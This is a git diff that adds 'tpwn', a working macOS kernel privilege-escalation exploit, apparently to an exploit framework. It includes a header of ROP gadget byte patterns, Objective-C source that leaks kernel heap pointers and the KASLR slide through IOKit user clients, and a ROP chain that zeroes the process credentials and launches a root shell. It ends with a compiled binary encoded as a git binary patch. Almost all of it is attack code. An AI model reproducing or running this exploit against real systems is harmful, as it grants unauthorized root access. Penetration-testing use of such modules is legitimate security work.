+// advanced register control (experimental) - many of these gadget do not require stack pivoting, but allow for register control and register based flow control (which lets us back up registers that our pivot corrupts).
+// how the fuck do these gadgets even exist lmao
+
+#define ROP_RAX_TO_RDI_POP_RBP_JMP_RCX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xC7, 0x5D, 0xFF, 0xE1}), 6, 0);
+#define ROP_RAX_TO_RSI_POP_RBP_JMP_RCX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xC6, 0x5D, 0xFF, 0xE1}), 6, 0);
+#define ROP_RBX_TO_RSI_CALL_RCX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xDE, 0xFF, 0xD1}), 5, 0); // This function does movq rbx, rsi; callq *rcx. so *rcx should point to a pop gadget.
+#define ROP_RAX_TO_RCX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xC1, 0x48, 0x89, 0xC8, 0x5D, 0xC3}), 8, 0);
+#define ROP_CR4_TO_RAX_WRITE_RAX_TO_pRCX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x0F, 0x20, 0xE0, 0x48, 0x89, 0x01, 0x5D, 0xC3}), 8 , 0)
+#define ROP_RAX_TO_CR4_WRITE_ESI_TO_60H_RDI_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x0F, 0x22, 0xE0, 0x89, 0x77, 0x60, 0x5D, 0xC3}), 8 , 0)
+#define ROP_PUSH_RBP_8H_RDI_TO_RAX_JMP_0H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x55, 0x48, 0x89, 0xE5, 0x48, 0x8B, 0x47, 0x08, 0x5D, 0xFF, 0x20}), 0xB , 0)
+#define ROP_RAX_TO_RDI_RCX_TO_RSI_CALL_58H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xC7, 0x48, 0x89, 0xCE, 0xFF, 0x50, 0x58}), 9 , 0)
+#define ROP_POP_RBX_RBP_JMP_28H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5B, 0x5D, 0xFF, 0x60, 0x28}), 5 , 0)
+#define ROP_WRITE_RBX_WHAT_R14_WHERE_POP_ _POP_R14_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x49, 0x89, 0x1E, 0x5B, 0x41, 0x5E, 0x5D, 0xC3}), 8 , 0)
+#define ROP_POP_R14_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x41, 0x5E, 0x5D, 0xC3}), 4, 0)
+#define ROP_RBX_TO_RSI_CALL_30H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xDE, 0xFF, 0x50, 0x30}), 6, 0)
+#define ROP_RDI_TO_RBX_CALL_130H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xFB, 0xFF, 0x90, 0x30, 0x01, 0x00, 0x00}), 9, 0)
+#define ROP_RSI_TO_RBX_CALL_178H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xF3, 0xFF, 0x90, 0x78, 0x01, 0x00, 0x00}), 9, 0)
+#define ROP_RSI_TO_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xF0, 0x5d, 0xC3}), 5, 0)
+#define ROP_INC_48H_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0xff, 0x40, 0x48, 0x5d, 0xC3}), 6, 0)
+// register control
+#define ROP_POP_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x58, 0xC3}), 2 , 0)
+#define ROP_POP_RCX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x59, 0xC3}), 2 , 0)
+#define ROP_POP_RDX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5A, 0xc3}), 2 , 0)
+#define ROP_POP_RBX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5B, 0xc3}), 2 , 0)
+#define ROP_POP_RSP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5C, 0xC3}), 2 , 0)
+#define ROP_POP_RSP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5C, 0x5d, 0xC3}), 3 , 0)
+#define ROP_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5D, 0xc3}), 2 , 0)
+#define ROP_POP_RSI(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5E, 0xc3}), 2 , 0)
+#define ROP_POP_RDI(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5F, 0xc3}), 2 , 0)
+#define ROP_RSI_TO_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x55, 0x48, 0x89, 0xE5, 0x48, 0x89, 0xF0, 0x5D, 0xC3}), 9 , 0)
+
+// write gadgets
+#define ROP_WRITE_RDX_WHAT_RCX_WHERE_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x89,0x11,0x5D,0xC3}), 5 , 0)
+#define ROP_WRITE_RAX_WHAT_RDX_WHERE_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x89,0x02,0x5D,0xC3}), 5 , 0)
+
+// read gadget
+#define ROP_READ_RAX_TO_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x8B,0x00,0x5D,0xC3}), 5 , 0)
+
+
+// simple nop. 0x90 is added to avoid 0xC3 matching non-executable kernel contents.
+
+#define ROP_NULL_OP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x90, 0xC3}), 2, 0);
+
+// helpers
+
+#define PUSH_GADGET(stack) stack->__rop_chain[stack->__cnt++]
+#define ROP_ARG1(stack, map, value) ROP_POP_RDI(map); PUSH_GADGET(stack) = value;
+#define ROP_ARG2(stack, map, value) ROP_POP_RSI(map); PUSH_GADGET(stack) = value;
+#define ROP_ARG3(stack, map, value) ROP_POP_RDX(map); PUSH_GADGET(stack) = value;
+#define ROP_ARG4(stack, map, value) ROP_POP_RCX(map); PUSH_GADGET(stack) = value;
+#define ROP_RAX_TO_ARG1(stack, map) ROP_POP_RCX(map); PUSH_GADGET(stack) = ROP_NULL_OP(map); PUSH_GADGET(stack) = ROP_RAX_TO_RDI_POP_RBP_JMP_RCX(map); PUSH_GADGET(stack) = JUNK_VALUE;
+#endif
diff --git a/data/exploits/tpwn/main.m b/data/exploits/tpwn/main.m
new file mode 100644
index 0000000000..9400395f71
--- /dev/null
+++ b/data/exploits/tpwn/main.m
@@ -0,0 +1,286 @@
+#include <Foundation/Foundation.h>
+static uint64_t kslide=0;
+#define ALLOCS 0x100
+#import "import.h"
+#import "lsym_gadgets.h"
+static mach_port_t servicea = 0;
+static mach_port_t servicex = 0;
+__attribute__((always_inline)) inline
+lsym_slidden_kern_pointer_t lsym_slide_pointer(lsym_kern_pointer_t pointer) {
+    if (!pointer) return pointer;
+    return (lsym_slidden_kern_pointer_t) pointer + kslide;
+}
+
+__attribute__((always_inline)) static inline
+uint64_t alloc(uint32_t addr, uint32_t sz) {
+    vm_deallocate(mach_task_self(), (vm_address_t) addr, sz);
+    vm_allocate(mach_task_self(), (vm_address_t*)&addr, sz, 0);
+    while(sz--) *(char*)(addr+sz)=0;
+    return addr;
+}
+__attribute__((always_inline)) static inline
+uint64_t leak_heap_ptr(io_connect_t* co) {
+    io_connect_t conn = MACH_PORT_NULL;
+    if(IOServiceOpen(servicea, mach_task_self(), 0, co) != KERN_SUCCESS) {
+        puts("failed");
+        exit(-20);
+    }
+    uint64_t    scalarO_64=0;
+    uint32_t    outputCount = 1;
+    IOConnectCallScalarMethod(*co, 2, NULL, 0, &scalarO_64, &outputCount);
+    if (!scalarO_64) {
+        puts("failed infoleaking");
+        exit(-20);
+    }
+    scalarO_64 <<= 8;
+    scalarO_64 |=  0xffffff0000000000;
+    return  scalarO_64;
+}
+typedef struct {
+    mach_msg_header_t header;
+    mach_msg_body_t body;
+    mach_msg_ool_descriptor_t desc;
+    mach_msg_trailer_t trailer;
+} oolmsg_t;
+static uint16_t off_w = 0;
+__attribute__((always_inline)) static inline
+void or_everywhere(uint64_t add) {
+    io_connect_t conn = MACH_PORT_NULL;
+    IOServiceClose(0); // dyld fails when aslr = 0 & NULL page is mapped, so force this symbol into the plt
+    IOServiceOpen(0,0,0,0);  // dyld fails when aslr = 0 & NULL page is mapped, so force this symbol into the plt
+    alloc(0, 0x1000);
+    volatile uint64_t* mp = (uint64_t*) 0;
+    if(!off_w) {
+        while ((uint32_t)mp < 0xC00) {
+            *mp=(uint64_t)0xC00;
+            mp++;
+        }
+        IOServiceOpen(servicex, kIOMasterPortDefault, 0, &conn);
+        IOServiceClose(conn);
+        char* kp=(char*)0xC00;
+        while ((uint32_t)kp < 0x1000) {
+            if (*kp == 0x10) {
+                break;
+            }
+            kp++;
+        }
+        if ((uint32_t)kp == 0x1000) {
+            vm_deallocate(mach_task_self(), 0, 0x1000);
+            puts("not vulnerable");
+            exit(-1);
+        }
+        mp=0;
+        while ((uint32_t)mp < 0xC00) {
+            *mp=(uint64_t)0xC00 - (uint32_t)(kp-0xC00);
+            mp++;
+        }
+        IOServiceOpen(servicex, kIOMasterPortDefault, 0, &conn);
+        IOServiceClose(conn);
+        if (*((char*)0xC00)!=0x10) {
+            vm_deallocate(mach_task_self(), 0, 0x1000);
+            puts("wrong offset");
+            exit(-2);
+        }
+        off_w = (uint16_t) kp - 0xc00;
+    }
+    mp=0;
+    while ((uint32_t)mp < 0xC00) {
+        *mp=(uint64_t)(add - off_w);
+        mp++;
+    }
+    IOServiceOpen(servicex, kIOMasterPortDefault, 0, &conn);
+    vm_deallocate(mach_task_self(), 0, 0x1000);
+    IOServiceClose(conn);
+}
+__attribute__((always_inline)) static inline
+void send_kern_data(char* vz, size_t svz, mach_port_t* msgp) {
+    oolmsg_t *msg=calloc(sizeof(oolmsg_t)+0x2000,1);
+    if(!*msgp){
+        mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, msgp);
+        mach_port_insert_right(mach_task_self(), *msgp, *msgp, MACH_MSG_TYPE_MAKE_SEND);
+    }
+    bzero(msg,sizeof(oolmsg_t));
+    msg->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
+    msg->header.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
+    msg->header.msgh_remote_port = *msgp;
+    msg->header.msgh_local_port = MACH_PORT_NULL;
+    msg->header.msgh_size = sizeof(oolmsg_t);
+    msg->header.msgh_id = 1;
+    msg->body.msgh_descriptor_count = 1;
+    msg->desc.address = (void *)vz;
+    msg->desc.size = svz;
+    msg->desc.type = MACH_MSG_OOL_DESCRIPTOR;
+    mach_msg( (mach_msg_header_t *) msg, MACH_SEND_MSG, sizeof(oolmsg_t), 0, 0, 0, 0 );
+    free(msg);
+}
+__attribute__((always_inline)) static inline
+char* read_kern_data(mach_port_t port) {
+    oolmsg_t *msg=calloc(sizeof(oolmsg_t)+0x2000,1);
+    bzero(msg,sizeof(oolmsg_t)+0x2000);
+    mach_msg((mach_msg_header_t *)msg, MACH_RCV_MSG, 0, sizeof(oolmsg_t)+0x2000, (port), 0, MACH_PORT_NULL);
+    return msg->desc.address;
+}
+int main(int argc, char** argv, char** envp){
+    if (getuid() == 0) {
+        execve("/bin/sh",((char* []){"/bin/sh",0}), envp);
+        exit(0);
+    }
+    if((int)main < 0x5000) execve(argv[0],argv,envp);
+    lsym_map_t* mapping_kernel=lsym_map_file("/mach_kernel");
+    if (!mapping_kernel || !mapping_kernel->map) {
+        mapping_kernel=lsym_map_file("/System/Library/Kernels/kernel");
+    }
+    lsym_map_t* mapping_audio=lsym_map_file("/System/Library/Extensions/IOAudioFamily.kext/Contents/MacOS/IOAudioFamily");
+    kslide = kext_pointer("com.apple.iokit.IOAudioFamily") + RESOLVE_SYMBOL(mapping_audio, "__ZTV23IOAudioEngineUserClient") + 0x10;
+    sync();
+    kern_return_t err;
+    io_iterator_t iterator;
+    IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOHDIXController"), &iterator);
+    servicex = IOIteratorNext(iterator);
+    IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOAudioEngine"), &iterator);
+    servicea = IOIteratorNext(iterator);
+    uint64_t c = 0;
+    or_everywhere((uint64_t)&c);
+    if (c != 0x10) {
+        puts("not vulnerable");
+        return 2;
+    }
+    int ctr=0;
+#define DO_TIMES(x) for(ctr=0;ctr<x;ctr++)
+    struct KernelHeapInfo {
+        io_connect_t connect;
+        uint64_t kobject;
+        mach_port_t port;
+    } *heap_info = calloc(sizeof(struct KernelHeapInfo),ALLOCS);
+    char* vz = calloc(1500,1);
+    
+again:;
+    int maxt = 10;
+    while (maxt--) {
+        if (heap_info[maxt+2].connect) {
+            IOServiceClose(heap_info[maxt+2].connect);
+            heap_info[maxt+2].connect=0;
+        }
+    }
+    maxt = 10;
+    while (((heap_info[0].kobject = leak_heap_ptr(&(heap_info[0].connect))) & 0xFFF) == 0xC00) { heap_info[0].connect=0; };
+    while ((heap_info[1].kobject = leak_heap_ptr(&(heap_info[1].connect))) ) {
+        if (heap_info[1].kobject == 1024+heap_info[0].kobject) {
+            break;
+        }
+        if (maxt == 0) {
+            goto again;
+        }
+        maxt--;
+        heap_info[maxt+2].connect=heap_info[1].connect;
+        heap_info[1].connect=0;
+    };
+    
+    if (!heap_info[1].connect || !heap_info[0].connect) {
+        exit(-3);
+    }
+    
+    IOServiceClose(heap_info[0].connect); // poke hole
+    
+    DO_TIMES(ALLOCS) {
+        send_kern_data(vz, 1024 - 0x58, &(heap_info[ctr].port));
+    }
+    
+    or_everywhere(heap_info[0].kobject + 16);
+    or_everywhere(heap_info[0].kobject + 500);
+    
+    char found = 0;
+    DO_TIMES(ALLOCS) {
+        char* data = read_kern_data(heap_info[ctr].port);
+        if (!found && memcmp(data,vz,1024 - 0x58)) {
+            kslide = (*(uint64_t*)((1024-0x58+(char*)data))) - kslide ;
+            found=1;
+        }
+    }
+    if (!found) {
+        exit(-3);
+    }
+    
+    printf("leaked kaslr slide, @ 0x%016llx\n", kslide);
+    
+    kernel_fake_stack_t* stack = calloc(1,sizeof(kernel_fake_stack_t));
+    
+    PUSH_GADGET(stack) = ROP_ARG1(stack, mapping_kernel, heap_info[1].kobject+0x208);
+    PUSH_GADGET(stack) = ROP_ARG2(stack, mapping_kernel, sizeof(uint64_t));
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_bzero");
+    
+    PUSH_GADGET(stack) = ROP_ARG1(stack, mapping_kernel, heap_info[1].kobject+0x220);
+    PUSH_GADGET(stack) = ROP_ARG2(stack, mapping_kernel, 1)
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_bzero");
+    
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_current_proc");
+    PUSH_GADGET(stack) = ROP_RAX_TO_ARG1(stack, mapping_kernel);
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_proc_ucred");
+    PUSH_GADGET(stack) = ROP_RAX_TO_ARG1(stack, mapping_kernel);
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_posix_cred_get");
+    PUSH_GADGET(stack) = ROP_RAX_TO_ARG1(stack, mapping_kernel);
+    PUSH_GADGET(stack) = ROP_ARG2(stack, mapping_kernel, sizeof(int)*3)
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_bzero");
+    
+    PUSH_GADGET(stack) = ROP_ARG1(stack, mapping_kernel, (uid_t)getuid())
+    PUSH_GADGET(stack) = ROP_ARG2(stack, mapping_kernel, (int)-1);
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_chgproccnt");
+    PUSH_GADGET(stack) = ROP_ARG1(stack, mapping_kernel, (uid_t)0);
+    PUSH_GADGET(stack) = ROP_ARG2(stack, mapping_kernel, (int)1);
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_chgproccnt");
+    
+    PUSH_GADGET(stack) = ROP_POP_RAX(mapping_kernel);
+    PUSH_GADGET(stack) = heap_info[1].kobject+0x210;
+    PUSH_GADGET(stack) = ROP_READ_RAX_TO_RAX_POP_RBP(mapping_kernel);
+    PUSH_GADGET(stack) = JUNK_VALUE;
+    PUSH_GADGET(stack) = ROP_RAX_TO_ARG1(stack,mapping_kernel);
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_IORecursiveLockUnlock");
+    PUSH_GADGET(stack) = ROP_POP_RAX(mapping_kernel);
+    PUSH_GADGET(stack) = heap_info[1].kobject+0xe0;
+    PUSH_GADGET(stack) = ROP_READ_RAX_TO_RAX_POP_RBP(mapping_kernel);
+    PUSH_GADGET(stack) = JUNK_VALUE;
+    PUSH_GADGET(stack) = ROP_RAX_TO_ARG1(stack,mapping_kernel);
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "__ZN10IOWorkLoop8openGateEv");
+    PUSH_GADGET(stack) = ROP_POP_RAX(mapping_kernel);
+    PUSH_GADGET(stack) = heap_info[1].kobject+0xe8;
+    PUSH_GADGET(stack) = ROP_READ_RAX_TO_RAX_POP_RBP(mapping_kernel);
+    PUSH_GADGET(stack) = JUNK_VALUE;
+    PUSH_GADGET(stack) = ROP_RAX_TO_ARG1(stack,mapping_kernel);
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "__ZN13IOEventSource8openGateEv");
+    
+    PUSH_GADGET(stack) = ROP_ARG1(stack, mapping_kernel, (uint64_t)"Escalating privileges! -qwertyoruiop\n")
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_IOLog");
+
+    PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_thread_exception_return");
+    
+    uint64_t* vtable=malloc(0x1000);
+    
+    vtable[0] = 0;
+    vtable[1] = 0;
+    vtable[2] = 0;
+    vtable[3] = ROP_POP_RAX(mapping_kernel);
+    vtable[4] = ROP_PIVOT_RAX(mapping_kernel);
+    vtable[5] = ROP_POP_RAX(mapping_kernel);
+    vtable[6] = 0;
+    vtable[7] = ROP_POP_RSP(mapping_kernel);
+    vtable[8] = (uint64_t)stack->__rop_chain;
+
+    or_everywhere(heap_info[1].kobject+0x220); // set online
+    or_everywhere(heap_info[1].kobject+0x208); // set userbuffer to 0x000000000010 (!= NULL)
+    alloc(0, 0x1000);
+    volatile uint64_t* mp = (uint64_t*) 0x10;
+    mp[0] = (uint64_t)0;
+    mp[1] = (uint64_t)vtable;
+    mp[2] = (uint64_t)&mp[1];
+    uint64_t xn = IOConnectRelease((io_connect_t  )heap_info[1].connect); // running code!
+    vm_deallocate(mach_task_self(), 0, 0x1000);
+    setuid(0);
+    if (getuid() == 0) {
+        system("/bin/sh");
+        exit(0);
+    }
+    
+    puts("didn't get root, but this system is vulnerable. ");
+    puts("kernel heap may be corrupted");
+    return 1;
+}
diff --git a/data/exploits/tpwn/tpwn b/data/exploits/tpwn/tpwn
new file mode 100755
index 0000000000000000000000000000000000000000..dabce3a9ec01a42e8416de90ab067636c4551d7f
GIT binary patch
literal 31484
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
